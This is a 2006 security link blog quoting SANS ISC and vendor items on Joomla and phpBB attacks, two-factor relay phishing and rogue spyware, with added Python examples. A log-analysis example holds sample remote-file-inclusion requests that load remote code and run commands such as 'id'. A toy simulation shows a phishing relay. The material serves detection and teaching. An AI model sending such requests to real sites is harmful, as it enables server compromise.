Monday, July 31, 2006

Pinch My Ride

Quite an amazing tale of physical/electronic security being beaten...

Pinch My Ride: "Brad Stone writes on Wired News:

Last summer Emad Wassef walked out of a Target store in Orange County, California, to find a big space where his 2003 Lincoln Navigator had been. The 38-year-old truck driver and former reserve Los Angeles police officer did what anyone would do: He reported the theft to the cops and called his insurance company."


From: Fergie's Tech Blog

Attacks against Joomla com_peoplebook, (Sun, Jul 30th)

Yes, I have a handful of stories piling up, but I wanted to let this one through first. I don't think I need to make any cynical remarks about PHP and security...it's all about the apps, and to date, I've not seen a lot of well coded PHP apps out there. Here's yet another PHP app that allowed a system to be compromised...

Attacks against Joomla com_peoplebook, (Sun, Jul 30th): "As reported in a couple of previous diaries (http://isc.sans.org/diary.php?storyid=1483 and 1480), less than adequate input validation resulted in a fair few attacks against Joomla and Mambo components. Joomla is a powerful open-source Content Management System written in PHP. Yesterday we received word of another attack, this time against com_peoplebook.
Here are a few of the httpd log entries that we were provided, suitably sanitized at the hosting provider's request. Note the timelag between log entries - there was a living human at the other end of the wire manually manipulating this server.
[...]"

Source: ISC SANS

Friday, July 14, 2006

Tip #1283 - How to edit tips in mozilla using vim - mozex

I'm quite pleased to say this works for me! I've been wanting this feature for some time now.

Tip #1283 - How to edit tips in mozilla using vim - mozex: "Hi,

This is very similar to vimtip#581. In fact, I'm just trying to shamelessly drag your attention to http://mozex.mozdev.org again. I adopted the mozex plugin and I'm continuing its development. All the installation (and de-installation) issues for any Mozilla-based browser should be fixed. And there are many more new things (start the external editor by hotkey, a nice configuration dialog, UTF-8 editing and more). Just be sure to install the latest development version.

Any comments are welcome.

Hope this helps
--
Vladimir"


Source: tips : vim online

Thursday, July 13, 2006

Number Theory, (Sun, Jul 2nd)

Never quite learned the nitty gritty of IP addresses or subnet masks? Read this, and with any luck, it'll all click. (No pun intended.)

Number Theory, (Sun, Jul 2nd): "Yesterday we posted a diary entry about mystery URLs found in some Apache logs. We received many responses, and several readers pointed out that the strings are probably obfuscations of dotted-quad IP addresses. A few readers suggested that since the strings are nine numbers they could be US Social Security Numbers (for those outside the USA, we keep track of all our citizens through a system that is "not" supposed to be a national identity but has become one out of convenience; the nine-digit number is represented as XXX-YY-ZZZZ and the XXX part is a reference code to the general part of the USA you were in when you registered for the number.) I'll give you my theory about the mystery URLs in a moment.
...
[Read the full story for a great lesson!]

From: SANS ISC
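The diary's readers guessed the nine-digit strings were IP addresses written as one integer, which every browser and inet_aton() happily accept. Here is an added example (my code, not the ISC diary's) that decodes those spellings back to dotted quads, flags them in log lines, and does the subnet-mask arithmetic the intro above alludes to. The log lines are constructed for the example.

```python
import re

# Added example, not from the ISC diary: decode the integer, hex and octal
# spellings of an IPv4 address that browsers and inet_aton() accept, and the
# mask arithmetic behind CIDR membership. Log lines below are constructed.

def dotted_to_int(ip: str) -> int:
    """'192.168.1.1' -> 3232235777 (the 32-bit value the stack actually routes on)."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted quad: {ip!r}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]

def int_to_dotted(n: int) -> str:
    """3232235777 -> '192.168.1.1'."""
    if not 0 <= n <= 0xFFFFFFFF:
        raise ValueError(f"not a 32-bit value: {n}")
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def _part_to_int(part: str) -> int:
    # inet_aton rules: 0x-prefix is hex, a leading zero is octal, otherwise decimal.
    if not part.isalnum():
        raise ValueError(f"bad address part: {part!r}")
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def normalize_host(host: str) -> str:
    """Canonical dotted quad for any inet_aton-style spelling (a.b.c.d, a.b.c, a.b or a,
    each part decimal, hex or octal); ValueError if the string is not an address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        raise ValueError(f"not an IPv4 spelling: {host!r}")
    vals = [_part_to_int(p) for p in parts]
    n = 0
    for v in vals[:-1]:                  # every part but the last is one octet
        if not 0 <= v <= 255:
            raise ValueError(f"octet out of range in {host!r}")
        n = (n << 8) | v
    tail_bytes = 4 - (len(vals) - 1)     # the last part fills the remaining bytes
    if not 0 <= vals[-1] < (1 << (8 * tail_bytes)):
        raise ValueError(f"tail out of range in {host!r}")
    return int_to_dotted((n << (8 * tail_bytes)) | vals[-1])

def in_network(ip: str, cidr: str) -> bool:
    """Subnet-mask test the way the kernel does it: AND both sides with the mask."""
    net, prefix = cidr.split("/")
    mask = (0xFFFFFFFF << (32 - int(prefix))) & 0xFFFFFFFF
    return (dotted_to_int(ip) & mask) == (dotted_to_int(net) & mask)

URL_HOST = re.compile(r"https?://([^/:\s\"]+)")

SAMPLE_LOG = [  # constructed Apache lines with obfuscated hosts in the query string
    '10.0.0.5 - - [01/Jul/2006:03:14:07 +0000] "GET /index.php?p=http://167772161/x.txt HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jul/2006:03:14:09 +0000] "GET /index.php?p=http://0xC0.0250.1.1/x.txt HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jul/2006:03:15:00 +0000] "GET /index.php?p=http://www.example.com/ HTTP/1.1" 200 512',
]

def decode_log_hosts(lines):
    """(as-written, canonical) pairs for every URL host that is an IPv4 address in disguise."""
    found = []
    for line in lines:
        for host in URL_HOST.findall(line):
            try:
                canon = normalize_host(host)
            except ValueError:
                continue                  # a real hostname, not a number
            if canon != host:
                found.append((host, canon))
    return found

if __name__ == "__main__":
    for raw, canon in decode_log_hosts(SAMPLE_LOG):
        print(f"{raw:>20} -> {canon}")
```

The shortened forms (a.b.c, a.b, a) are the part most people miss: the last part is allowed to fill all the remaining bytes, which is exactly why a single nine- or ten-digit number is a complete address.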

phpbb 0 day worm or just too many unpatched boxes?, (Thu, Jul 13th)

Running phpBB? I think I'd recommend that you just scrap that idea, and find something more secure. Maybe this particular instance is a false alarm, but I can't even count the number of times I've seen warnings about phpBB exploits.

phpbb 0 day worm or just too many unpatched boxes?, (Thu, Jul 13th): "We received a report of a phpbb 0 day.

Upon investigation, it may be a re-hash of the mosConfig_absolute_path exploit hitting unpatched systems.

We're looking into the report and will update the diary as we get new information."


From: SANS ISC
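Both ISC items above come down to the same thing: a query parameter (mosConfig_absolute_path in the Mambo/Joomla case) that is supposed to hold a local path but is fed a URL, and a log full of attempts, some by scripts and some, as the com_peoplebook diary notes, by a person typing slowly. As an added example (my code, not the ISC diary's; the log lines are constructed, not the sanitized entries the diary withheld), here is a small Apache-log checker that flags URL-valued parameters and uses the gaps between one client's attempts to guess whether a human was at the keyboard. The 10-second threshold is an assumption.

```python
import re
from datetime import datetime
from statistics import median
from urllib.parse import urlsplit, parse_qsl, unquote

# Added example, not from either ISC diary: flag remote-file-inclusion attempts
# (a query parameter carrying a URL, mosConfig_absolute_path being the classic
# Mambo/Joomla case) in Apache access logs and use the gaps between a client's
# attempts to tell a hand-driven session from a scripted one. The log lines are
# constructed; they are not the sanitized entries the diary withheld.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
MANUAL_GAP_S = 10      # assumption: a median gap this large means a human is typing the URLs
URL_VALUE = re.compile(r"^(https?|ftp)://", re.I)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def rfi_params(target):
    """(name, value) for every query parameter whose value is itself a URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)            # catches a second layer of %-encoding
        if URL_VALUE.match(value):
            hits.append((name, value))
    return hits

def analyze(lines):
    """Per source IP: number of RFI attempts, parameters abused, median gap, operator guess."""
    by_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rfi_params(rec["target"])
        if hits:
            by_ip.setdefault(rec["ip"], []).append((rec["ts"], hits))
    report = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        if not gaps:
            operator = "single hit"
        elif median(gaps) >= MANUAL_GAP_S:
            operator = "manual"
        else:
            operator = "scripted"
        report[ip] = {
            "attempts": len(events),
            "params": sorted({name for _, hits in events for name, _ in hits}),
            "median_gap_s": median(gaps) if gaps else None,
            "operator": operator,
        }
    return report

SAMPLE_LOG = [  # constructed; 203.0.113.7 pokes by hand, 192.0.2.44 is a scanner
    '203.0.113.7 - - [29/Jul/2006:22:41:03 +0000] "GET /index.php?option=com_example&mosConfig_absolute_path=http://198.51.100.9/cmd.txt? HTTP/1.1" 200 3112 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Jul/2006:22:41:51 +0000] "GET /index.php?option=com_example&mosConfig_absolute_path=http://198.51.100.9/cmd.txt?&cmd=id HTTP/1.1" 200 3180 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Jul/2006:22:43:20 +0000] "GET /index.php?option=com_example&mosConfig_absolute_path=http://198.51.100.9/cmd.txt?&cmd=uname%20-a HTTP/1.1" 200 3205 "-" "Mozilla/4.0"',
    '198.51.100.200 - - [29/Jul/2006:22:50:00 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8810 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [29/Jul/2006:23:05:10 +0000] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2F192.0.2.44%2Fa.txt%3F HTTP/1.1" 404 211 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [29/Jul/2006:23:05:10 +0000] "GET /mambo/index.php?mosConfig_absolute_path=http://192.0.2.44/a.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [29/Jul/2006:23:05:11 +0000] "GET /joomla/index.php?mosConfig_absolute_path=http://192.0.2.44/a.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

The trailing "?" on the included URL is part of the trick: whatever the PHP script appends to the path ("/includes/foo.php" and the like) becomes a query string on the attacker's server instead of breaking the include. A 404 from the scanner still means the box was probed; only the 200s with a cmd= parameter following mean it worked.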

Overplot

Simply incredible - Mihai never ceases to do extremely cool stuff with JavaScript. However, when it comes to practical Google Maps mashups regarding NY, I'm personally quite fond of onNYTurf's NYC Subway Map.

Overplot: "Google engineer Mihai Parparita's latest Maps mashup is just too nifty not to mention here on Code: Overheard in NY + Maps' API + Reader = Overplot

His blog post explains a few of the specific problems he encountered while creating it:

'The most basic issue with implementing this is geocoding all of the location strings (like 'Canal & Broadway') to a latitude/longitude pair... It is not perfect, but since the set of addresses is pretty tightly constrained, I was able to add some rewriting rules to make the input more easily parsed. As of right now, 54% of the addresses are geocoded.'
'I didn't want to directly scrape the HTML of the site to extract all of the quotes. I ended up using the data stored in Google Reader's archive of the site's feed. This allowed me to get at the quotes themselves more easily, without having to worry about the chrome of the site.'
'Instead of each marker being its own overlay, I put all of them in the same overlay (see the QuotesOverlay class). Additionally, I did not ..."

Mihai's full post @ persistent.info.

P.S. I should point out that Overheard in NY is a pretty crass website, with humor that may not amuse all audiences.

From: Google Code Blog

Recent Two factor authentication attacks, (Wed, Jul 12th)

Well, it was only a matter of time before this happened...quite a clever scam, as usual. (Last I'd heard, CAPTCHAs were being defeated by displaying them on download pages for other resources, and getting interested humans to enter the code, proxying the result to the original site.) Also, F-Secure has a similar story which I considered posting, but I'm going to favor ISC's piece in this case.

Recent Two factor authentication attacks, (Wed, Jul 12th): "There have been recent reports of two-factor-authentication-protected websites getting attacked by a man-in-the-middle type of setup where the victim enters information (including the token code) into a look-alike website; this look-alike website immediately uses those credentials to log in to the actual financial site. Obviously, upon successful login by the user, the attacker can immediately execute the fraudulent transaction.

While this might sound shocking to the financial industry since we haven't seen too many of these attacks, the theory of the attack and the risk have certainly been well understood within the security community. (I wrote an article on this back in April.)

Overall, two-factor authentication will reduce the risk of attacks by raising the effort of the attacker to compromise the accounts, but it might not have the level of security enhancement that some people believed. In the man-in-the-middle attack, the flaw happens due to the lack of verification of the bank's website by the victim; the victim is simply tricked into yielding credentials" ...

Source: SANS ISC
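To make the ISC point concrete, here is an added example (my code, not the diary's) of the relay in miniature: a bank that wants a password plus a 30-second time-based code, a look-alike site that forwards whatever the victim types within a couple of seconds, and the money gone before the code expires. The "one-time" property does nothing for the victim because the attacker is the first to use the code. The second half goes one step past the diary: since the root cause it names is that the victim never verifies which site they are on, the same bank is shown with the code bound to the origin the browser is actually talking to (the idea later standardized in U2F/FIDO), and the relay fails. Hosts, user, password and seed are constructed; the bank is a toy.

```python
import hashlib
import hmac

# Added example, not from the ISC diary: a minimal bank login with a
# password plus a time-based token, a look-alike site that relays what the
# victim types in real time, and the same bank once the token is bound to the
# origin the victim's browser is actually talking to. Hosts, user, password
# and seed are constructed for the example.

BANK_ORIGIN = "https://bank.example"
PHISH_ORIGIN = "https://bank-login-secure.example"    # the look-alike site
STEP_SECONDS = 30                                     # token validity window
SECRET = b"constructed-seed-shared-with-alice's-token"

def otp(secret: bytes, step: int, origin: str = "") -> str:
    """Six-digit HOTP-style code over the time step; with an origin, over step+origin."""
    msg = step.to_bytes(8, "big") + origin.encode()
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    value = int.from_bytes(digest[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{value % 1_000_000:06d}"

class Bank:
    def __init__(self, bind_origin: bool):
        self.bind_origin = bind_origin
        self.users = {"alice": {"password": "correct horse", "secret": SECRET, "balance": 1000}}
        self.sessions = {}
        self.used_codes = set()

    def login(self, user, password, code, now):
        u = self.users.get(user)
        if u is None or password != u["password"]:
            return None
        step = int(now // STEP_SECONDS)
        origin = BANK_ORIGIN if self.bind_origin else ""
        if code not in {otp(u["secret"], s, origin) for s in (step - 1, step)}:
            return None                   # wrong, expired, or computed for another site
        if (user, code) in self.used_codes:
            return None                   # a code is accepted once only
        self.used_codes.add((user, code))
        token = hashlib.sha256(f"{user}:{now}:{len(self.sessions)}".encode()).hexdigest()
        self.sessions[token] = user
        return token

    def transfer(self, token, amount):
        user = self.sessions.get(token)
        if user is None or self.users[user]["balance"] < amount:
            return False
        self.users[user]["balance"] -= amount
        return True

class Victim:
    """Types password and the current token into whatever site shows the login form."""
    def __init__(self, secret):
        self.secret = secret

    def submit(self, origin_in_address_bar, now, bind_origin):
        code = otp(self.secret, int(now // STEP_SECONDS), origin_in_address_bar if bind_origin else "")
        return "alice", "correct horse", code

def phish_and_relay(bank, victim, now):
    """The attack from the diary: the look-alike site relays credentials within seconds."""
    user, pw, code = victim.submit(PHISH_ORIGIN, now, bank.bind_origin)
    session = bank.login(user, pw, code, now + 2)      # relayed well inside the 30 s window
    if session is None:
        return {"login": False, "transfer": False, "victim_retry": None}
    moved = bank.transfer(session, 900)
    # the victim's own later attempt with the same code now fails: the attacker used it first
    victim_retry = bank.login(user, pw, code, now + 5)
    return {"login": True, "transfer": moved, "victim_retry": victim_retry}

if __name__ == "__main__":
    now = 1_154_390_400.0                              # any fixed instant; constructed
    print("plain token:  ", phish_and_relay(Bank(bind_origin=False), Victim(SECRET), now))
    print("origin-bound: ", phish_and_relay(Bank(bind_origin=True), Victim(SECRET), now))
```

The one thing the plain-token bank does notice is the victim's own login failing a moment later with "code already used", which is a detection signal worth alerting on; it is not a prevention.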

Monday, July 10, 2006

Google releases answer to Passport

Well, I've yet to say a thing about Google Checkout (I'm quite hesitant to give Google my CC#), and I think I'll keep it that way. Instead, let me post this, which is far more interesting.
Google releases answer to Passport: "Google just released the Account Authentication Proxy for Web-Based Applications [Update: Google has removed the page this link points to] -- which looks a lot like Passport. According to the website, this proxy lets web-based applications create services protected by a Google Account by enabling a web application to get an authentication token without ever [...]"
From: ZDNet Blogs: Googling Google

Security Rollup

...not the Microsoft or Apple kind, though. (The MS one comes out tomorrow, by the way.)

I've been a bit remiss at posting this stuff, but left it pending... and still don't have time to add writeups to these fine stories.

SANS ISC

Hacking Wireless Drivers for Fun and Profit, (Fri, Jul 7th): "An ISC reader pointed out this relatively new exploit vector. At the upcoming BlackHat conference, a duo is going to demonstrate hacking WiFi device drivers to assume control of a target machine. The combination of device drivers (which sit close to the kernel) and wireless technology makes this vector uniquely possible. Most device drivers you couldn't safely attack, because the devices are attached to the actual hardware, but wireless is meant to work over distance. The vector is still limited by distance to those close enough to some transmission agent, but with the growing prevalence of free wireless hotspots it is easy to find places where enough laptops congregate to get good results (say a conference or an airport terminal). Basically it's a neat little vector of attacks I imagine we'll be seeing more of in the near future.

---
John Bambenek
bambenek /at/ gmail /dot/ com"

F-Secure Weblog

$pyware Economics: "

On April 7th we posted about New York's lawsuit against Direct Revenue.

BusinessWeek has been examining the court documents and they have a very interesting article, The Plot To Hijack Your Computer, and related items detailing Direct Revenue's business model.

There's also a podcast for those of you on the go. Check it out.

On 08/07/06 At 06:17 AM"

What's In a Name?: "There's a category of software that's rather difficult to define, or at least to name. Many term it as potentially unwanted applications or software (PUA/PUS). Companies pushing this type of software use every possible means to get you to download as many copies of their product as possible. Spamming, pop-ups, hijacking start pages, etc. Sound familiar?

What are we speaking of? Rogue anti-spyware and other so-called system optimization utilities. And they aren't just pushing one version, they're pushing many.

Some of these guys create one engine and then sell it under multiple names and interfaces. Their websites even look like they are copied from the same template. The sales pitch typically includes a 'free' scan. The results of the scan are often doctored with items that you should remove or fix. Except in order to do so, you now need to buy a license.

Check out the results of this Google search. Most of the results are of suspected rogues and are hosted on the same server. What did we search for? A block of text from one site's privacy policy."
...

Sunbelt Blog

Botnet primers: "A lot of activity is going on in the area of botnets. If you’re curious about them, you can study a few key references.

An Inside Look at Botnets. Paul Barford. Vinod Yegneswaran. Link here.

Botnets as a Vehicle for Online Crime - CERT/CC. Link here.

Know your Enemy: Tracking Botnets. Link here.

Jose Nazario over at Arbor Networks was kind enough to put these references together. As he says, “Read those and you'll be largely up to date with most IRC bots. Everything since then is largely incremental - crypto, obfuscation, etc. These do not cover P2P bots and HTTP bots, which are becoming hot topics.”

Happy reading.

Alex Eckelberry"


The end of an era: "Well this is one RIP that no one will grieve over:

Claria will stop displaying GAIN pop-up and other ads on July 1, 2006 and will stop supporting all GAIN Supported Software on October 1, 2006. After October 1, 2006, GAIN software may not function properly.

Our software will continue to collect data about your web usage from your computer for research and other purposes as described in our Privacy Statement until September 30, 2006, unless you uninstall the software before this date.

It is recommended that you uninstall all of GAIN Supported Software presently on your computer. To view a list of GAIN Supported Software installed on the computer you are currently using click here.

First time I’ve ever seen a spyware product ask you to uninstall itself.

Link here.

Alex Eckelberry
(Hat tip to Richard Smith)"

Wednesday, July 05, 2006

PIRT rocks!

Personally, I plan on joining this, and reporting some more phishes as I get them. Having not seen a proper clearinghouse mechanism in the past, I've only reported the ones I had time to report...to the compromised site and/or the company that's been spoofed. If you can, lend a hand to these fine folks!

PIRT rocks!: "Gary Warner, a steadfast volunteer who works on PIRT (the all-volunteer antiphishing group I started with Paul and Robin Laudanski), has some news to share of how well it’s going. It’s just incredible what’s happening out there — PIRT is really making a difference.

From an email from Gary:
Every day the PIRT Squad receives dozens of thank you notes from Brand Owners, Web Masters, and Network Owners, thanking us for letting them know about the Phish we have reported to them.

Do you know that NetCraft, who has an Anti-Phishing Toolbar used by tens of thousands of people to help protect themselves from phishing sites, says our team is #1 at reporting phish? This month we have notified them of 631 phishing sites that they have confirmed themselves to be phish. That is more than 40% of all the phishing sites confirmed by NetCraft for the month! (In May, we reported 1593 phishing URLs to them that they confirmed we were the FIRST anti-phishers to report!)

May was an INCREDIBLE month for PIRT. We produced 1143" ...


From: Sunbelt Blog